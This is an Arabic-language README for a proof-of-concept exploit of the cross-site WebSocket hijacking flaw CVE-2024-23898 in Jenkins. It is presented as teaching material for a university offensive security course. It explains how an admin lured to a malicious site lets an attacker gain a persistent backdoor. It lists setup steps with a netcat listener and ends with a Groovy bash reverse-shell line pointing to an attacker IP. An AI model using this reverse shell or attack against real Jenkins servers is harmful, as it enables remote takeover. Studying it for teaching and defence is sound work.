
إثبات مفهوم لاستغلال اختطاف WebSocket عبر المواقع لـ CVE-2024-23898 — ثغرة أمنية تؤثر على إصدارات Jenkins من 2.217 إلى 2.441. للاستخدام التعليمي في دورة الاختراق والأمن الهجومي في جامعة كارنيجي ميلون.
استغلال اختطاف WebSocket عبر المواقع (برهان المفهوم) لـ CVE-2024-23898 — ثغرة أمنية تؤثر على إصدارات Jenkins 2.217-2.441.
يستهدف هذا الاستغلال CLI لـ Jenkins والذي يمكن استخدامه للوصول عن بُعد وإصدار أوامر لخادم تحكم Jenkins. من خلال هذا الاستغلال، يمكن لمهاجم عن بُعد الحصول على الوصول وإنشاء باب خلفي دائم لخادم تحكم Jenkins إذا تم خداع مسؤول لزيارة موقع ضار أثناء تسجيل الدخول إلى خادم تحكم Jenkins المستهدف.
هذا الكود مخصص للأغراض التعليمية فقط وللاستخدام الحصري في دورة الاختراق والأمن الهجومي بجامعة كارنيجي ميلون. لا ينبغي تسليح هذا الكود أو استخدامه بطريقة أخرى لصنع برمجيات ضارة. يدين المؤلفون صراحة أي محاولة للقيام بذلك.
docker-compose build && docker-compose up -dnc -l <port_num> (استبدل <port_num> بأي رقم منفذ غير مستخدم)ipconfig getifaddr en0[http://localhost:8080/script](http://localhost:8080/script). سجل الدخول كحساب المسؤول إذا لم تكن قد فعلت ذلك بالفعل.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()